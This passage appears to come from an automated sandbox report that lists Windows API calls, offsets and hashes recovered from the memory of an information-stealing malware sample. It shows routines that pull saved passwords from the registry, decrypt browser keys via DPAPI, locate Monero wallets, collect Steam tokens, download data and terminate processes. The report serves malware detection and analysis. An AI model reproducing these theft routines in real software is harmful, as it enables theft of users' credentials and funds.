                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID:
                        • API String ID: 2500673778-0
                        • Opcode ID: 5a0df9f04cad26f45f3e5c8a7d32d0bef35694f3d828318f48425a8fe42d9307
                        • Instruction ID: c1720798e01b823affe2e1c60f006923a669b07c9e47fff4940e622a32b2bc97
                        • Opcode Fuzzy Hash: 5a0df9f04cad26f45f3e5c8a7d32d0bef35694f3d828318f48425a8fe42d9307
                        • Instruction Fuzzy Hash: 30A16030A012098FCB25DF25D949A7F77B4EF45304F18806EE6099B361DB7ADC52CB99
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00515F2A
                        • std::_Xinvalid_argument.LIBCPMT ref: 00515F49
                        • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00516014
                        • memmove.MSVCRT(00000000,00000000,?), ref: 0051609F
                        • std::_Xinvalid_argument.LIBCPMT ref: 005160D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_$memmove
                        • String ID: invalid string position$string too long
                        • API String ID: 1975243496-4289949731
                        • Opcode ID: 889b169ae673ebebd842148dd11edd5ecd47ae8db81363cbc236f0e428bbf1e1
                        • Instruction ID: 413607907151d2ffd1895642125d7bc6da0e91819048bb3adb35e0f2df2fea8b
                        • Opcode Fuzzy Hash: 889b169ae673ebebd842148dd11edd5ecd47ae8db81363cbc236f0e428bbf1e1
                        • Instruction Fuzzy Hash: A3617E70700544DBEB18CF5CC8D89AEBBB6FF88304B244959E5928B782E731ADC1CB95
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E06F
                        • lstrcat.KERNEL32(?,00000000), ref: 0050E07D
                        • lstrcat.KERNEL32(?,?), ref: 0050E098
                        • lstrcat.KERNEL32(?,?), ref: 0050E0AC
                        • lstrcat.KERNEL32(?,0102B248), ref: 0050E0C0
                        • lstrcat.KERNEL32(?,?), ref: 0050E0D4
                        • lstrcat.KERNEL32(?,0103D368), ref: 0050E0E7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E11F
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0050E126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$AttributesFile
                        • String ID:
                        • API String ID: 3428472996-0
                        • Opcode ID: c3719f81ab082e8f6e28098457bf20be486c27adc2462d3e52d572b31ca1552d
                        • Instruction ID: cbf0930e9929e39d4aa5c42b296ba0ebdf4f6e4fbbf7f8cd1cdb4cb64869db4c
                        • Opcode Fuzzy Hash: c3719f81ab082e8f6e28098457bf20be486c27adc2462d3e52d572b31ca1552d
                        • Instruction Fuzzy Hash: E7418D71D1011CDBCB35EB64DD49AED77B4BF48300F1489A9BA0A93290DB789F868F94
                        APIs
                          • Part of subcall function 004F77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004F7805
                          • Part of subcall function 004F77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 004F784A
                          • Part of subcall function 004F77D0: StrStrA.SHLWAPI(?,Password), ref: 004F78B8
                          • Part of subcall function 004F77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F78EC
                          • Part of subcall function 004F77D0: HeapFree.KERNEL32(00000000), ref: 004F78F3
                        • lstrcat.KERNEL32(00000000,00524AD4), ref: 004F7A90
                        • lstrcat.KERNEL32(00000000,?), ref: 004F7ABD
                        • lstrcat.KERNEL32(00000000, : ), ref: 004F7ACF
                        • lstrcat.KERNEL32(00000000,?), ref: 004F7AF0
                        • wsprintfA.USER32 ref: 004F7B10
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F7B39
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F7B47
                        • lstrcat.KERNEL32(00000000,00524AD4), ref: 004F7B60
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                        • String ID: :
                        • API String ID: 398153587-3653984579
                        • Opcode ID: f575156f847d32a461e28f9d9bc6580e3d498d24f5eb8f181d02767730c06929
                        • Instruction ID: 236c2bd5d7d1ac2bf2452a268d9901a4e7355e91a099b30888b3fe7901b1334e
                        • Opcode Fuzzy Hash: f575156f847d32a461e28f9d9bc6580e3d498d24f5eb8f181d02767730c06929
                        • Instruction Fuzzy Hash: E2317272A04228EFCB20DB68DC449BBB779FB85704F19851EE60593240DB7DA942CB59
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 0050820C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00508243
                        • lstrlen.KERNEL32(00000000), ref: 00508260
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00508297
                        • lstrlen.KERNEL32(00000000), ref: 005082B4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005082EB
                        • lstrlen.KERNEL32(00000000), ref: 00508308
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00508337
                        • lstrlen.KERNEL32(00000000), ref: 00508351
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00508380
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 02798ac02a48e47bac7b0d1df9233ff37c5ac4bb2c77b814cf8915da8907f245
                        • Instruction ID: e500f73402ef65eeb7d2f5aded5ad39bbd2eeccc52f44142acccb52f2a980704
                        • Opcode Fuzzy Hash: 02798ac02a48e47bac7b0d1df9233ff37c5ac4bb2c77b814cf8915da8907f245
                        • Instruction Fuzzy Hash: 9A51AF70A016069BEB14DF29DD58EBEBBA8FF40700F004914AD96DB284DB34ED61CBD0
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004F7805
                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 004F784A
                        • StrStrA.SHLWAPI(?,Password), ref: 004F78B8
                          • Part of subcall function 004F7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 004F775E
                          • Part of subcall function 004F7750: RtlAllocateHeap.NTDLL(00000000), ref: 004F7765
                          • Part of subcall function 004F7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004F778D
                          • Part of subcall function 004F7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004F77AD
                          • Part of subcall function 004F7750: LocalFree.KERNEL32(?), ref: 004F77B7
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004F78EC
                        • HeapFree.KERNEL32(00000000), ref: 004F78F3
                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 004F7A35
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                        • String ID: Password
                        • API String ID: 356768136-3434357891
                        • Opcode ID: fffd2302aceaaab046520cb87b0e17cb6d97f0279ee0f84a3bbb89577f99cc8e
                        • Instruction ID: e53b99d31a0fe8e24bb0aeb674dab99ee5b0f9bc0526c779bce697623fd21e06
                        • Opcode Fuzzy Hash: fffd2302aceaaab046520cb87b0e17cb6d97f0279ee0f84a3bbb89577f99cc8e
                        • Instruction Fuzzy Hash: E37120B1D0021DABDB10DF95DC80EEEB7B9FF44300F14856AE609A7240EB795A85CB95
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F1135
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F113C
                        • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004F1159
                        • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004F1173
                        • RegCloseKey.ADVAPI32(?), ref: 004F117D
                        Strings
                        • wallet_path, xrefs: 004F116D
                        • SOFTWARE\monero-project\monero-core, xrefs: 004F114F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                        • API String ID: 3225020163-4244082812
                        • Opcode ID: d816eac6748311975f3cc63408cd931cad1548c93495509d7e596760920d5035
                        • Instruction ID: 26f5182d9abd8b2c9d4aadf6e616124cd8d23a07b62c17f42bc9a7928c56597e
                        • Opcode Fuzzy Hash: d816eac6748311975f3cc63408cd931cad1548c93495509d7e596760920d5035
                        • Instruction Fuzzy Hash: 3CF0907564031DBBE7209BE0AD4DFEB7B7CEB04715F004054FF05E2280EAB45A4587A8
                        APIs
                        • memcmp.MSVCRT(?,v20,00000003), ref: 004F9E04
                        • memcmp.MSVCRT(?,v10,00000003), ref: 004F9E42
                        • LocalAlloc.KERNEL32(00000040), ref: 004F9EA7
                          • Part of subcall function 005171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005171FE
                        • lstrcpy.KERNEL32(00000000,00524C48), ref: 004F9FB2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpymemcmp$AllocLocal
                        • String ID: @$v10$v20
                        • API String ID: 102826412-278772428
                        • Opcode ID: a3557be85a6ec5ce063f159ab93a2a1ce8b7446bd8695a337bdcba94f418015e
                        • Instruction ID: 41ca7911a836a7a9f127b825b065abf05dbf79913fdb674301ef5d9aa950e0d2
                        • Opcode Fuzzy Hash: a3557be85a6ec5ce063f159ab93a2a1ce8b7446bd8695a337bdcba94f418015e
                        • Instruction Fuzzy Hash: EA51B331A1020D9BDB10EF69DC45BAE7BB4FF44318F15402AFA09EB291DBB8DD518B94
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004F565A
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F5661
                        • InternetOpenA.WININET(0051CFEC,00000000,00000000,00000000,00000000), ref: 004F5677
                        • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 004F5692
                        • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004F56BC
                        • memcpy.MSVCRT(00000000,?,00000001), ref: 004F56E1
                        • InternetCloseHandle.WININET(?), ref: 004F56FA
                        • InternetCloseHandle.WININET(00000000), ref: 004F5701
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                        • String ID:
                        • API String ID: 1008454911-0
                        • Opcode ID: 4c2f3ac0ee2a7d49d35c8862f9478f61ee9652a7a3698dc815bdeed99c1f0a4a
                        • Instruction ID: 9e58e2bab306a284d509e8b3e2b85551ff8f43a1a3db8be92ea371a5c73d797c
                        • Opcode Fuzzy Hash: 4c2f3ac0ee2a7d49d35c8862f9478f61ee9652a7a3698dc815bdeed99c1f0a4a
                        • Instruction Fuzzy Hash: C1414D70A01609DFDB24DF55DD88BABB7E4FF48300F14C06AE7089B291E7799942CB99
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00514759
                        • Process32First.KERNEL32(00000000,00000128), ref: 00514769
                        • Process32Next.KERNEL32(00000000,00000128), ref: 0051477B
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051479C
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 005147AB
                        • CloseHandle.KERNEL32(00000000), ref: 005147B2
                        • Process32Next.KERNEL32(00000000,00000128), ref: 005147C0
                        • CloseHandle.KERNEL32(00000000), ref: 005147CB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                        • String ID:
                        • API String ID: 3836391474-0
                        • Opcode ID: 2b6bcbc6e5d880f690b965d808ba93afb9a9cebb567878a888b8820e54ace875
                        • Instruction ID: a5a309b2b1060e7c2cd057954bd31788d441e2e269f1f3e948893600a3ee0e2e
                        • Opcode Fuzzy Hash: 2b6bcbc6e5d880f690b965d808ba93afb9a9cebb567878a888b8820e54ace875
                        • Instruction Fuzzy Hash: BD01B571601219ABF7305B609D89FEA7BBCFB08B51F045184FA09D10C1EF799DC28E69
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00508435
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050846C
                        • lstrlen.KERNEL32(00000000), ref: 005084B2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005084E9
                        • lstrlen.KERNEL32(00000000), ref: 005084FF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050852E
                        • StrCmpCA.SHLWAPI(00000000,00524C3C), ref: 0050853E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 04734e210ff9401e5e253a332d2da348b70a2b7469ac9f6c12f2ff6cabe801c8
                        • Instruction ID: 6024e2cb92f28b01d013e8999fe786fed41102a4825c8a12539b190ab54a2bc2
                        • Opcode Fuzzy Hash: 04734e210ff9401e5e253a332d2da348b70a2b7469ac9f6c12f2ff6cabe801c8
                        • Instruction Fuzzy Hash: E6516D71A00206AFDB24DF69D984E6BBBF9FF44300F148459EC86DB295EB34E9518B50
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00512925
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0051292C
                        • RegOpenKeyExA.ADVAPI32(80000002,0102B818,00000000,00020119,005128A9), ref: 0051294B
                        • RegQueryValueExA.ADVAPI32(005128A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00512965
                        • RegCloseKey.ADVAPI32(005128A9), ref: 0051296F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3225020163-1022791448
                        • Opcode ID: dd55570bf962c6a208517fc6fe3bad57e936e0fde4334e9402a4d37874aaecc8
                        • Instruction ID: cbacf3edb1b4f4f8d216740e0e8ad1e53ba94d43d1db3e3d47fea803b26a9ddb
                        • Opcode Fuzzy Hash: dd55570bf962c6a208517fc6fe3bad57e936e0fde4334e9402a4d37874aaecc8
                        • Instruction Fuzzy Hash: 0001BC75600219ABE720CBA49C59EEB7BACFB48711F148098FE4597280EA355A4687A4
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00512895
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0051289C
                          • Part of subcall function 00512910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00512925
                          • Part of subcall function 00512910: RtlAllocateHeap.NTDLL(00000000), ref: 0051292C
                          • Part of subcall function 00512910: RegOpenKeyExA.ADVAPI32(80000002,0102B818,00000000,00020119,005128A9), ref: 0051294B
                          • Part of subcall function 00512910: RegQueryValueExA.ADVAPI32(005128A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00512965
                          • Part of subcall function 00512910: RegCloseKey.ADVAPI32(005128A9), ref: 0051296F
                        • RegOpenKeyExA.ADVAPI32(80000002,0102B818,00000000,00020119,00509500), ref: 005128D1
                        • RegQueryValueExA.ADVAPI32(00509500,0103DCC0,00000000,00000000,00000000,000000FF), ref: 005128EC
                        • RegCloseKey.ADVAPI32(00509500), ref: 005128F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 526348952dcf851a186025071360582bfd356d6ea5c8bd35057ab40bde3850c9
                        • Instruction ID: 6a0f120aba353b7ff8e51314207eb0125909435da4dcdae4dd8686ae635ecdf7
                        • Opcode Fuzzy Hash: 526348952dcf851a186025071360582bfd356d6ea5c8bd35057ab40bde3850c9
                        • Instruction Fuzzy Hash: 9C01A271601219BBEB20DBA4EC4DFAA7B6CFB44311F008158FE08D2290EA75599687A5
                        APIs
                        • LoadLibraryA.KERNEL32(?), ref: 004F723E
                        • GetProcessHeap.KERNEL32(00000008,00000010), ref: 004F7279
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7280
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004F72C3
                        • HeapFree.KERNEL32(00000000), ref: 004F72CA
                        • GetProcAddress.KERNEL32(00000000,?), ref: 004F7329
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                        • String ID:
                        • API String ID: 174687898-0
                        • Opcode ID: 7e90ff3b3cb373cf80cbc32bf9d4a2b5bec2ef2368c1bba05e9ee52af820488d
                        • Instruction ID: eec00e80222fbeed7c781f78638e5afa171ec7ea34cfae9d2b8bab57b9f88000
                        • Opcode Fuzzy Hash: 7e90ff3b3cb373cf80cbc32bf9d4a2b5bec2ef2368c1bba05e9ee52af820488d
                        • Instruction Fuzzy Hash: 92415071B0560A9BD720CF69DC84BBAB3E8FB88305F1445AAEE4DC7340E639E901DB54
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 004F9CA8
                        • LocalAlloc.KERNEL32(00000040,?), ref: 004F9CDA
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004F9D03
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocLocallstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2746078483-738592651
                        • Opcode ID: 1688539a3a3c6000dd55e99c2eac77c8d1081ba90813fc8b40a290694dacba20
                        • Instruction ID: e0ef5d78b6119db24a6d90c03a755a13403e1ea30b934a70a6276759670b076a
                        • Opcode Fuzzy Hash: 1688539a3a3c6000dd55e99c2eac77c8d1081ba90813fc8b40a290694dacba20
                        • Instruction Fuzzy Hash: 5141AD31E0024D9BDB21EF65D941BBF77B4EF90308F14406AEA15A7392DA78ED01CB98
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050EA24
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050EA53
                        • lstrcat.KERNEL32(?,00000000), ref: 0050EA61
                        • lstrcat.KERNEL32(?,00521794), ref: 0050EA7A
                        • lstrcat.KERNEL32(?,01038B90), ref: 0050EA8D
                        • lstrcat.KERNEL32(?,00521794), ref: 0050EA9F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: 021e1e1980de3750bbb3e7276c6f4d1c5dc6f55cfc9b3db9fa7b8dcb764b1c09
                        • Instruction ID: 646daf004a07f74ef16e4d155c8f634efa7f323982ba2fb4d97bc9a6687bba0d
                        • Opcode Fuzzy Hash: 021e1e1980de3750bbb3e7276c6f4d1c5dc6f55cfc9b3db9fa7b8dcb764b1c09
                        • Instruction Fuzzy Hash: 1241F771E1011DABCB60EB64DC42EFD3778FF98300F0044A9BB1A97280DE749E858B58
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050ECDF
                        • lstrlen.KERNEL32(00000000), ref: 0050ECF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050ED1D
                        • lstrlen.KERNEL32(00000000), ref: 0050ED24
                        • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0050ED52
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: steam_tokens.txt
                        • API String ID: 367037083-401951677
                        • Opcode ID: 4421bb01c79e7223e0c96ecfb64e56044bf9ab7ae2214e383edb22e882f54f05
                        • Instruction ID: 1120a5d52cc522cac36b2fd3512b822fa74b2f902003c6328704e690767ca38c
                        • Opcode Fuzzy Hash: 4421bb01c79e7223e0c96ecfb64e56044bf9ab7ae2214e383edb22e882f54f05
                        • Instruction Fuzzy Hash: 5B31D432B101095BC721BB3AED4BA6E7B68FF40304F045429F905DB292DB78DC1647C9
                        APIs
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,004F140E), ref: 004F9A9A
                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004F140E), ref: 004F9AB0
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,004F140E), ref: 004F9AC7
                        • ReadFile.KERNEL32(00000000,00000000,?,004F140E,00000000,?,?,?,004F140E), ref: 004F9AE0
                        • LocalFree.KERNEL32(?,?,?,?,004F140E), ref: 004F9B00
                        • CloseHandle.KERNEL32(00000000,?,?,?,004F140E), ref: 004F9B07
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: f3e9e134ab792480e9df4d36e19ca02d9d294ec249e299d9f7ef9bf6656624fc
                        • Instruction ID: f2b2824edc75f64865d50eb451270beaa1545c655d01efe3ed8b567ed54f3199
                        • Opcode Fuzzy Hash: f3e9e134ab792480e9df4d36e19ca02d9d294ec249e299d9f7ef9bf6656624fc
                        • Instruction Fuzzy Hash: 50114F71A0020DAFE720DF69DD84FBB736CFB04344F14415AFA1196290DB78AD11CB69
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00515B14
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A188
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A1AE
                        • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00515B7C
                        • memmove.MSVCRT(00000000,?,?), ref: 00515B89
                        • memmove.MSVCRT(00000000,?,?), ref: 00515B98
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long
                        • API String ID: 2052693487-3788999226
                        • Opcode ID: 053da417fe043f86acbaba0b0d030f2a5e077dd1a6bb4cf7f201894f4c8c451c
                        • Instruction ID: 39962bea5ced6e49bd5716b99f4c1357cf826f207535b878bcdb7e73b5b83e8e
                        • Opcode Fuzzy Hash: 053da417fe043f86acbaba0b0d030f2a5e077dd1a6bb4cf7f201894f4c8c451c
                        • Instruction Fuzzy Hash: ED416E71B005199FDF08DF6CC895AAEBBA5FB88310F148229E909EB384E730DD40CB90
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00507D58
                          • Part of subcall function 0051A1C0: std::exception::exception.LIBCMT ref: 0051A1D5
                          • Part of subcall function 0051A1C0: std::exception::exception.LIBCMT ref: 0051A1FB
                        • std::_Xinvalid_argument.LIBCPMT ref: 00507D76
                        • std::_Xinvalid_argument.LIBCPMT ref: 00507D91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_$std::exception::exception
                        • String ID: invalid string position$string too long
                        • API String ID: 3310641104-4289949731
                        • Opcode ID: ff16afddd89e2277ce6ffa7c9b766adec37be7d53c79e2766c7c8c63435ac70e
                        • Instruction ID: 34152de967c146be2cc39813db5825861eee46cd5eb9fd99cafe9d1e78e15ed1
                        • Opcode Fuzzy Hash: ff16afddd89e2277ce6ffa7c9b766adec37be7d53c79e2766c7c8c63435ac70e
                        • Instruction Fuzzy Hash: 1321E9327042045BD721DE6CD881A3EBBE5BF95710F244A6EE442CB2C1D770EC40C765
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005133EF
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005133F6
                        • GlobalMemoryStatusEx.KERNEL32 ref: 00513411
                        • wsprintfA.USER32 ref: 00513437
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB
                        • API String ID: 2922868504-2651807785
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit$__getptdfree
                        • String ID: XuR$XuR
                        • API String ID: 2640026729-246973053
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,0103D428,00000000,00020119,?), ref: 0050D7F5
                        • RegQueryValueExA.ADVAPI32(?,0103DF30,00000000,00000000,00000000,000000FF), ref: 0050D819
                        • RegCloseKey.ADVAPI32(?), ref: 0050D823
                        • lstrcat.KERNEL32(?,00000000), ref: 0050D848
                        • lstrcat.KERNEL32(?,0103DF48), ref: 0050D85C
                        Memory Dump Source
